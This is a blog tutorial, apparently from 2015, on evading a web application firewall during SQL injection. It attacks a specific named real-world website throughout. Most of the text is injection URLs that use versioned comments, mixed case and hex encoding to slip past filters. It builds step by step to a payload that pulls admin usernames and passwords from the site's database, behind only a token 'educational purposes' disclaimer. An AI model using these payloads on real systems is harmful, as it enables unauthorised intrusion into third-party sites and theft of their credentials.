Bypass WAF in SQL injection

Less2. Bypass WAF in SQL injection



Hello friends

today i will teach you how to bypass WAF in sql injection . WAF stand for web application firewall. Waf filter our injection and stops our query.
so lets start ,

This video is only for educational purposes….. Hacking Is illegal

Step 1. Find The Injection Point On Any Php Site
(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid=  etc)

Like This Site :- www.site.com/index.php?id=1

Step2. After Find It First Check This Site vulnerable Or Not……
i Have A site http://www.universecapital.co.in/about_us.php?page_id=11
we will add single Quotes(‘) after:- ?id=11
Like This http://www.universecapital.co.in/about_us.php?page_id=11’
Hit Enter

Step3. After adding the Single Quotes(‘) If Site Showing Some Sqli Error Or Hide Data On This This Min Its vulnerable.

Step4. Start The  Operation On Url, Now We Will Count total Number Of Columns In Information_schema.
We Will Use Order By Query For The Count The Columns.

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=11′ order by 100--
i am putting -- for comment out the query,It is Showing error or Unknown Columns so.
now total number of columns is between 1 to 100 .
now i will decrease my columns no.
Step5. Now I Select Just 20th number of columns for shorting the site data.
Like this:-     http://www.universecapital.co.in/about_us.php?page_id=11′ order by 20--+
still error
Here Is Total no. Of Columns Is 12 Because at 13 there is Error or Unknown Columns

Step6. Now I Am Going To use Union Command For Checking Vulnerable Columns

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ union select all 1,2,3,4,5,6,7,8,9,10,11,12--+

Here Union Is Combining Both Of The Queries 1st one is site’s Query and 2nd is my select query..

Here It Is Not Printing Vulnerable Columns Because There Is Not Sufficient Free Space To Print
Vulnerable Columns…. so i will hide site data by using -- sign.

Step7. Now Its Showing Error Here Is Firewall(WAF) That Block The My Union Statement
So I Use Some Statement Like This (/*!50000block statement*/) Ex:-/*!50000union*/

Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000UNION*/ALL SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+

Now  Here  Vulnerable Columns is 6,5 and 11.
Now We Will Fetch All The Data Using Column Number 5,11 And 6.
Here Is Some Cmd For Fetch Data On Website:-
Variable/Function        Output
@@hostname    :            Current Hostname
@@tmpdir    :            Tept Directory
@@datadir    :            Data Directory
@@version    :            Version of DB
@@basedir    :            Base Directory
user()        :            Current User
database()    :            Current Database
version()    :            Version
schema()    :            current Database
UUID()        :            System UUID key
current_user()    :        Current User
current_user    :        Current User
system_user()    :        Current Sustem user
session_user()    :        Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl    :    Check if it have ssl or not

Step8.  Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:-        http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000UNION*/ SELECT ALL 1,2,3,4,version(),6,7,8,9,10,database(),12--+
You See On Website Page:- Database Is= ‘ univerca_universe ‘  ,    Version= ‘5.5.42-37.1’

Step9. Now We Will Fetch table_names
Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ union select all 1,2,3,4,table_name,6,7,8,9,10,11,12 from information_schema.tables --+

information_schema is the collection of database…..here we are fetching all tablesname from all database…
Here there is Only one table But I want all the tables of information_schema…so i use group_concat() For the grouping of tables…

Step10. Again Error Here Now Try To Bypass WAF Again
Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000table_name*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables --+

Step11. But i Want table_names only from database….so now we will set where condition…

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000group_concat(table_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Step12. Again WAF Is Here Its Block My Some Query (Group_Concat) So I Try To Convert It Small Char And Big Char

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Now These are all table of the database…

Step13. Now I Am unable to see all the tables so i will use <br> tag for the parallel printing of tablenames.

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name,<br>)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Hit Enter We Shown A Error,  We Need To Encrypt The <br> Tag In 0xHEX Code <br>=(0x3c62723e)

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name,0x3c62723e)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Step14. Now I Fetch Table name ‘admin’

Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(column_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.columns where table_name=admin --+

oops Here Is Firewall That Block the table_name=admin fetching.
now i will Encrypt The admin_login in mysql_char().

Like This= http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(column_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.columns where table_name=0x61646d696e --+

We Got It The admin Columns.

Step15. Now i fetch Juicy Data  That Is   username and password

like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(username,0x3a,password)*/,6,7,8,9,10,11,12 /*!50000from*/ admin --+

In This Step i Use 0x3a  for Divide The name and password (:)  And Remember Don’t Forget It Decrypte The admin on normal txt in Final Step.
Bypass WAF in SQL injection Bypass WAF in SQL injection Reviewed by Unknown on 12/09/2015 Rating: 5
Powered by Blogger.